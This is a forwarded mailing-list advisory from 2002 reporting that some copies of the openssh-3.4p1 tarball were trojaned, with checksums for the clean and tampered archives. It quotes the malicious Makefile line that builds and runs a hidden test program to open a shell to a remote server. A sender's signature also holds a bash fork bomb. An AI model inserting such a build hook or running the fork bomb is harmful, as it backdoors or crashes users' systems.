FYI....from my Linux User Group maillist.


>X-Authentication-Warning: majordomo set sender to 
>Date: Thu, 1 Aug 2002 13:20:48 -0700
>Subject: <3CLUG> !!!! [[EMAIL PROTECTED]: openssh-3.4p1.tar.gz 
>distribution recently trojaned] !!!!
>Mail-Followup-To: [EMAIL PROTECTED]
>User-Agent: Mutt/
>if you didn't know this already, some copies of the source distribution
>of openssh are *trojaned*!  the _untrojaned_ version has this md5 sum:
>459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to
>check it).  the trojan horse connects to a computer in australia and
>opens a shell on the local machine.
>   Ed
>----- Forwarded message from Mikael Olsson <[EMAIL PROTECTED]> -----
>Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
>Precedence: bulk
>List-Id: <>
>List-Post: <mailto:[EMAIL PROTECTED]>
>List-Help: <mailto:[EMAIL PROTECTED]>
>List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
>List-Subscribe: <mailto:[EMAIL PROTECTED]>
>Delivered-To: mailing list [EMAIL PROTECTED]
>Delivered-To: moderator for [EMAIL PROTECTED]
>Date: Thu, 01 Aug 2002 13:20:47 +0200
>From: Mikael Olsson <[EMAIL PROTECTED]>
>Organization: Clavister AB
>Subject: openssh-3.4p1.tar.gz distribution recently trojaned
>X-MailScanner: Found to be clean
>----- Forwarded message from Edwin Groothuis <[EMAIL PROTECTED]> -----
>Date: Thu, 1 Aug 2002 16:55:51 +1000
>From: Edwin Groothuis <[EMAIL PROTECTED]>
>Subject: openssh-3.4p1.tar.gz trojaned
>Just want to inform you that the OpenSSH package op
>(and probably all its mirrors now) it trojaned:
>The OpenBSD people have been informed about it (via email to
>The changed files are openssh-3.4p1/openbsd-compat/
>  all: libopenbsd-compat.a
>+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
>./bf-test.out &
>bf-test.c[1] is nothing more than a wrapper which generates a
>shell-script[2] which compiles itself and tries to connect to an
>server running on (
>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
>ports system:
>     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
>     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>Edwin Groothuis      |            Personal website:
>[EMAIL PROTECTED]    |    Weblog:
>bash$ :(){ :|:&};:   | Interested in MUDs?
>----- End forwarded message -----

To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message

Reply via email to